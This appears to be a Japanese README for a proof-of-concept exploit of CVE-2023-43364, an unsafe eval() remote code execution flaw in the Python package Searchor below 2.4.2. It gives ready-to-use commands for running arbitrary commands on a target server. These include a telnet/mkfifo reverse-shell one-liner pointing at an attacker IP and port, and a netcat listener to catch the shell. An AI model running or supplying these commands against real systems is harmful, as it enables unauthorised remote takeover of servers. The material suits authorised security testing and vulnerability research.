
Searchor(< 2.4.2)における安全でない `eval()` 使用を介した POC エクスプロイト
安全でない
eval()の使用による Searchor (< 2.4.2) のリモートコード実行(RCE)
このプロジェクトは、Pythonパッケージ Searchor (< 2.4.2) に影響を与えるリモートコード実行(RCE)脆弱性である CVE-2023-43364 の悪用を実証します。
この問題は、ユーザー制御の入力に対する安全でない eval() の使用に起因し、攻撃者が任意のPythonコードを注入して実行できるようにします。
この脆弱性は、公式パッチに示されているように、安全でない eval() の使用を削除することで修正されました。
追加の技術詳細とアドバイザリ:
このPoCは、コマンド実行、テスト検証、リバースシェルを含む複数の実行方法を提供します。
コード実行を確認するために、簡単なコマンド(id)を実行します:
python3 CVE-2023-43364.py <URL> --test
任意のコマンドを実行 ターゲットサーバー上で任意のコマンドを実行します:
python3 CVE-2023-43364.py <URL> -a "whoami"
例:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
リバースシェル お使いのマシンでリスナーを起動します:
nc -lvnp 4444
エクスプロイトを実行します:
python3 CVE-2023-43364.py <URL> <LHOST>
このプロジェクトは、以下を目的としています:
作者は、このツールによって引き起こされた誤用や損害について責任を負いません。
このエクスプロイトは、管理された環境、または明示的なテスト許可を得たシステムでのみ使用してください。